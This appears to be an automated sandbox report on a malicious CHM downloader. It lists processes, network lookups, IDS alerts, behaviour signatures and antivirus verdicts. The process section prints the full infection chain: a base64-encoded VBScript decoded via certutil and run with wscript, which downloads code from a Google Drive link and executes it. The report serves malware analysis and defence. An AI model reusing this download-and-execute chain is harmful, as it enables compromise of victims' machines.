Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | May 23, 2023, 4:18 p.m. | May 23, 2023, 4:20 p.m. |
-
cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "nSJWlP" C:\Users\test22\AppData\Local\Temp\1.chm
3028-
-
cmd.exe "C:\Windows\System32\cmd.exe" /c echo T24gRXJyb3IgUmVzdW1lIE5leHQ6U2V0IGluZXN6Y2R3bHBvaiA9IENyZWF0ZU9iamVjdCgiTVNYTUwyLlNlcnZlclhNTEhUVFAiKTppbmVzemNkd2xwb2oub3BlbiAiR0VUIiwgImh0dHBzOi8vZHJpdmUuZ29vZ2xlLmNvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQ9MU92YmUxc2UzUmg5V0gxTFlUMW9iMW5ncGR0akpXMXlGJmNvbmZpcm09dCIsIEZhbHNlOmluZXN6Y2R3bHBvai5TZW5kOkV4ZWN1dGUoaW5lc3pjZHdscG9qLnJlc3BvbnNlVGV4dCkndGZmeGRkcnNkc3Nhd2R4dmNiZ25oamp1eWpidg > "C:\\ProgramData\\Iconcache.dat" & start /MIN certutil -decode "C:\\ProgramData\\Iconcache.dat" "C:\\ProgramData\\Iconcache.vbs"
1324-
certutil.exe certutil -decode "C:\\ProgramData\\Iconcache.dat" "C:\\ProgramData\\Iconcache.vbs"
1220
-
-
wscript.exe "C:\Windows\System32\wscript.exe" //e:vbscript //b "C:\\ProgramData\\Iconcache.vbs"
2632
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
drive.google.com | 142.250.76.142 |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.102:49175 -> 142.250.199.78:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.102:49175 142.250.199.78:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 | CN=*.google.com | 08:73:2c:18:30:14:52:c3:ca:3e:02:79:65:b4:fe:90:ac:3f:3e:33 |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
request | GET https://drive.google.com/uc?export=download&id=1Ovbe1se3Rh9WH1LYT1ob1ngpdtjJW1yF&confirm=t |
domain | drive.google.com |
file | C:\ProgramData\Iconcache.vbs |
cmdline | "C:\Windows\System32\cmd.exe" /c echo T24gRXJyb3IgUmVzdW1lIE5leHQ6U2V0IGluZXN6Y2R3bHBvaiA9IENyZWF0ZU9iamVjdCgiTVNYTUwyLlNlcnZlclhNTEhUVFAiKTppbmVzemNkd2xwb2oub3BlbiAiR0VUIiwgImh0dHBzOi8vZHJpdmUuZ29vZ2xlLmNvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQ9MU92YmUxc2UzUmg5V0gxTFlUMW9iMW5ncGR0akpXMXlGJmNvbmZpcm09dCIsIEZhbHNlOmluZXN6Y2R3bHBvai5TZW5kOkV4ZWN1dGUoaW5lc3pjZHdscG9qLnJlc3BvbnNlVGV4dCkndGZmeGRkcnNkc3Nhd2R4dmNiZ25oamp1eWpidg > "C:\\ProgramData\\Iconcache.dat" & start /MIN certutil -decode "C:\\ProgramData\\Iconcache.dat" "C:\\ProgramData\\Iconcache.vbs" |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
Lionic | Trojan.HTML.Generic.4!c |
ALYac | Trojan.Downloader.CHM |
Symantec | Trojan.Gen.NPE |
ESET-NOD32 | HTML/TrojanDownloader.Agent.NLU |
Avast | Other:Malware-gen [Trj] |
Kaspersky | UDS:DangerousObject.Multi.Generic |
BitDefender | Exploit.CHM-Downloader.Gen |
MicroWorld-eScan | Exploit.CHM-Downloader.Gen |
Tencent | Win32.Trojan-Downloader.Ader.Fwnw |
Emsisoft | Exploit.CHM-Downloader.Gen (B) |
VIPRE | Exploit.CHM-Downloader.Gen |
TrendMicro | HEUR_CHM.E |
McAfee-GW-Edition | Artemis!Trojan |
FireEye | Exploit.CHM-Downloader.Gen |
GData | Exploit.CHM-Downloader.Gen |
MAX | malware (ai score=86) |
Arcabit | Exploit.CHM-Downloader.Gen |
ZoneAlarm | HEUR:Trojan.Script.Generic |
AhnLab-V3 | Dropper/CHM.Generic |
Rising | Trojan.MouseJack/HTML!1.BE26 (CLASSIC) |
Fortinet | JS/Agent.00E5!tr |
AVG | Other:Malware-gen [Trj] |